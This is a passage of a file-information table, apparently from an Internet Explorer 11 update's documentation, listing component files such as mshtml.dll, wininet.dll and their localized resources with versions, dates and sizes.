\nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.19301| 25-Feb-2019| 23:31| 417,280 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:26| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:01| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 18:15| 4,859,904 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 21:59| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 5:38| 615,936 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:28| 381,952 \ninstall.ins| Not versioned| 12-Feb-2021| 16:26| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 1,422,848 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:42| 92,672 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 25,762,816 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 21:24| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:30| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 19:17| 2,915,840 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:04| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 15,506,944 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:36| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 